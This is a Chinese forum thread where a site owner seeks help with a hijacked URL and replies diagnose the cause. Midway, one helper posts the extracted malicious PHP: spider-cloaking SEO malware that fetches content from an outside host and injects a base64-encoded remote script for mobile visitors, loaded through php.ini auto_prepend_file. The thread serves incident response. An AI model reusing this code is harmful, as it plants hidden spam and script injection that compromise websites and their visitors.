网站被劫持了请教下大佬如何解决

中木马了吧

上班打开了你这个域名，差点被公司领导看到，差一点凉凉了

js 代码呗

@feidao158 上面的网址我随便写的
@proxytoworld 检查了请求 nginx 有请求日志，我在项目的第一行代码直接 exit 了 执行不到 js 文件

@feidao158 绝了,差点社死+1,这个 xx 能打开也就算了,关键还这么劲爆

@feidao158 额额。。。。。上面网址我随便写的 有点巧 改不了了

蹲个后续，还真没遇到过随便加个参数就能劫持的。

中木马了, 扫描一下代码吧; 我之前遇到过.

@dai269619118 ..有没有可能是 js 挂在 cdn 上，你不能通过 nginx 日志去判断啊，明显是前端 js 代码跳转的，打开控制台看是哪里获取到了这个 aff 然后跳转的

百度收录还正常吗

@proxytoworld 老哥 我在程序的第一行就执行了 exit('hello world') 测试了一下 不执行任何其他代码 这个被劫持的页面还是打得开

@xbchaonba 收录还是正常的 主要只有这么一个 url 有问题

上 https 啊

www.xxx.com 我刚打开了，确实跳转了，但没有跳转到 OP 所说的那个网址啊。。。它跳转到 http://www.xxx.com 了。
咳咳

@dai269619118 #11 是什么神仙操作？说细点，哪个文件，那里你 exit 了？

@Shazoo 老哥 在主入口文件 整个网站只执行这一句代码

也有可能是中间件被修改了导致的劫持。没走到代码层面，之前宝塔劫持事件就是修改的 nginx

上 https

这个应该是通过你链接加个广告
修改 htacess 文件

1. 你把你 www.xxx.com/xxx 页面源码贴出来
2. 排除 dns 劫持，dns 劫持不可能只劫持一个页面，除非运营商劫持 http ，但你两个运营商都有显然不可能
3. HTML 代码怎么 exit 我不理解

@yumusb nginx+php 这种组合 中间也没有其他什么服务

@proxytoworld 用爬虫抓了下页面 所有页面的头部都被注入了莫名其妙的<a>标签

@dai269619118 nginx php 篡改都能做到这个效果

@yumusb 老哥 应该是你说的这个问题 在 nginx 上我屏蔽了这个地址 异常的那个 url 打不开了
这种一般要怎么检查 老哥麻烦提供点接下来处理的思路

@dai269619118 发个联系方式 来个权限可以帮你查查看

上 cloudflare

@yumusb 感谢老哥 微信: anV3ZW41NTU=

……在公司电脑上不小心打开了黄网，要是被监控发现被通告
我哭死你

<?php
set_time_limit(0);
error_reporting(0);
header("Content-Type: text/html;charset=");
$a = "stristr";
$b = $_SERVER;
function httpGetlai($c)
{
$d = curl_init();
curl_setopt($d, CURLOPT_URL, $c);
curl_setopt($d, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
curl_setopt($d, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($d, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($d, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($d, CURLOPT_HEADER, 0);
$e = curl_exec($d);
curl_close($d);
return $e;
}
define('url', $b['REQUEST_URI']);
define('ref', !isset($b['HTTP_REFERER']) ? '' : $b['HTTP_REFERER']);
define('ent', $b['HTTP_USER_AGENT']);
define('site', "http://sid.hj6j.com/utf8/?");
define('road', "app?domain=" . $b['HTTP_HOST'] . "&path=" . url . "&spider=" . urlencode(ent));
define('memes', road . "&referer=" . urlencode(ref));
define('regs', '@BaiduSpider|Sogou|Yisou|Haosou|360Spider@i');
define('mobile', '/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/');
define('area', $a(url, ".xml") or $a(url, ".fdc") or $a(url, ".one") or $a(url, ".bug") or $a(url, ".doc") or $a(url, ".love") or $a(url, ".txt") or $a(url, ".ppt") or $a(url, ".pptx") or $a(url, ".xls") or $a(url, ".csv") or $a(url, ".shtml") or $a(url, ".znb") or $a(url, ".msl") or $a(url, ".mdb") or $a(url, ".hxc"));
if (preg_match(regs, ent)) {
if (area) {
echo httpGetlai(site . road);
exit;
} else {
echo httpGetlai("http://sid.hj6j.com/utf8/u.php");
}
}
if (area && preg_match(mobile, ent)) {
echo base64_decode('PHNjcmlwdCBzcmM9aHR0cHM6Ly8wc3VnYXJhZGRlZC5jb20vc2ouanM+PC9zY3JpcHQ+');
exit;
}

首先，你上没上 HTTPS ？上了的话排除 DNS 劫持，没上就上上。如果不是 DNS 劫持的话，看你 nginx 配置有无被篡改，没有的话就看 php ，还没有那就是前端引用的 js 出问题了，检查引用的外部 cdn 的 js 吧

@yumusb 这代码是从拿提出来的

服务器停掉在访问试试，有可能是服务器中毒了

详见：一次排查网站劫持过程流水账 https://zhufan.net/2023/10/08/%E4%B8%80%E6%AC%A1%E6%8E%92%E6%9F%A5%E7%BD%91%E7%AB%99%E5%8A%AB%E6%8C%81%E8%BF%87%E7%A8%8B%E6%B5%81%E6%B0%B4%E8%B4%A6/ 觉得有用点个感谢，回回发帖消耗的铜币

@yumusb 草 这真的太帅了，做安全的大佬？

YYF: ?

在入口断点没用的话，多半是生成了静态 html 了吧

@yumusb 怎么做到的？

@yumusb 老哥很强，这种劫持方式还是第一次见：在 php.ini 中有两个配置参数，auto_prepend_file 和 auto_append_file ，其作用相当于 php 代码 require 或 include ，使用这两个指令包含的文件如果该文件不存在，将产生一个警告。

auto_prepend_file 表示在 php 程序加载应用程序前加载指定的 php 文件

auto_append_file 表示在 php 代码执行完毕后加载指定的 php 文件

@ahait 应该是批量抓鸡，ioc 搜索引擎一查发现很多网站都被干了，估计是黑产团伙作案，入侵点没找到，估计明天还会继续劫持，建议楼主再往下深入查下，找到具体入侵点（ web 漏洞、ssh 弱口令等等）

下次提前说下这个网站是干什么的！ 在公司大屏屏幕打开，差点升天

前段时间刚处理过,我遇到那个问题是 nginx 下载源有问题,被织配置了,你可以重新换个源看看